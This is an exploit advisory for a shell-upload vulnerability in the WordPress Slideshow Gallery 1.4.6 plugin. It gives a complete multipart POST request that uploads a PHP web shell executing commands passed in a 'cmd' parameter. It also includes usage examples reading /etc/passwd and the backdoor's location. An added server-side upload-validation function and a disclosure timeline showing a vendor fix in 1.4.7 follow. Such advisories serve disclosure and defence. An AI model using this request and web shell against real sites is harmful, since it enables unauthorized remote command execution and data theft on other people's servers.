Wordpress Slideshow Gallery

######################
# Exploit Title : WordPress Slideshow Gallery 1.4.6 Shell Upload Vulnerability

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://tribulant.com

# Software Link : http://downloads.wordpress.org/plugin/slideshow-gallery.1.4.6.zip

# Date : 2014-08-09

# Tested on : Windows 7 / Mozilla Firefox

######################

# Description :  

The slide image upload in save.php accepts PHP files: any user who is allowed to save slides (administrators by default) can upload a PHP file, which is then stored under wp-content/uploads/slideshow-gallery/ and is executable from there.

######################

# Location

http://127.0.0.1/wp-content/plugins/slideshow-gallery/views/admin/slides/save.php

######################

# PoC Exploit:

POST
Host=127.0.0.1
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding=gzip, deflate
Referer=http://127.0.0.1/wp-admin/admin.php?page=slideshow-slides&method=save&id=4
Cookie=wordpress_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407776360%7C538bd40b62d672bbc26a5b5d8a0cf9e5; wp-settings-time-1=1407537471; wp-settings-time-2=1406916594; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse; voted_2=6; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407776360%7Cac34ce538e8b9532559c6940a5d73c04; redux_current_tab=3
Connection=keep-alive
Content-Type=multipart/form-data; boundary=---------------------------31064175401770
Content-Length=1839
POSTDATA =-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[id]"

4
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[order]"

0
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[title]"

titolo_demo
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[description]"


-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[showinfo]"

both
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[iopacity]"

70
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[type]"

file
-----------------------------31064175401770
Content-Disposition: form-data; name="image_file"; filename="shell.php"
Content-Type: application/octet-stream

<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Usage: http://target.com/shell.php?cmd=cat+/etc/passwd


-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[image_oldfile]"

2136.png
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[image_url]"


-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[uselink]"

N
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[link]"


-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[linktarget]"

self
-----------------------------31064175401770
Content-Disposition: form-data; name="submit"

Save Slide
-----------------------------31064175401770--


Backdoor location:

http://127.0.0.1/wp-content/uploads/slideshow-gallery/shell.php?cmd=pwd
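
The request above succeeds because the slide image upload keeps a client-supplied name such as shell.php. As an added example (not the plugin's own code and not its 1.4.7 fix), this is the kind of server-side validation that rejects that request; it assumes it runs inside WordPress so that wp_check_filetype_and_ext, wp_die and esc_html are available.

```php
<?php
// Added example (illustrative, not the Slideshow Gallery plugin's code):
// validate a slide image upload before it is moved into wp-content/uploads.
function validate_slide_image(array $file): array {
    // Reject anything that is not a successful, well-formed upload.
    if (!isset($file['tmp_name'], $file['name'], $file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        return ['ok' => false, 'reason' => 'upload error'];
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        return ['ok' => false, 'reason' => 'not an uploaded file'];
    }

    // Allowlist image extensions: filename="shell.php" is rejected here.
    $allowed = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return ['ok' => false, 'reason' => 'extension not allowed'];
    }

    // Content check: the bytes must really be an image of the declared type,
    // so PHP code renamed to .png is rejected as well.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || $info['mime'] !== $allowed[$ext]) {
        return ['ok' => false, 'reason' => 'content is not ' . $allowed[$ext]];
    }

    // Let WordPress cross-check extension against detected type too.
    $wp = wp_check_filetype_and_ext($file['tmp_name'], $file['name']);
    if (empty($wp['ext']) || empty($wp['type'])) {
        return ['ok' => false, 'reason' => 'rejected by wp_check_filetype_and_ext'];
    }

    // Never reuse the client-supplied name: generate one server-side.
    $newname = bin2hex(random_bytes(8)) . '.' . $ext;
    return ['ok' => true, 'name' => $newname];
}

// Usage from a save handler (illustrative; $uploads_dir is assumed):
// $r = validate_slide_image($_FILES['image_file']);
// if (!$r['ok']) { wp_die('Invalid slide image: ' . esc_html($r['reason'])); }
// move_uploaded_file($_FILES['image_file']['tmp_name'], $uploads_dir . '/' . $r['name']);
```

Independently of this check, configuring the web server so that PHP is not executed from wp-content/uploads limits what any bypass of the validation can do.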


PoC Video:

https://www.youtube.com/watch?v=9iuMsUFl9dM

######################

# Vulnerability Disclosure Timeline:

2014-08-09:  Discovered vulnerability (version 1.4.5)
2014-08-09:  Vendor Notification (Twitter)
2014-08-14:  Plugin version 1.4.6 released without fix
2014-08-14:  Vendor Notification (Support web page)
2014-08-15:  Vendor Response/Feedback 
2014-08-29:  Vendor Fix/Patch (1.4.7)
2014-09-01:  Public Disclosure

#####################

Discovered By : Claudio Viviani
            http://www.homelab.it

            https://www.facebook.com/homelabit
            https://twitter.com/homelabit
            https://plus.google.com/+HomelabIt1/
            https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################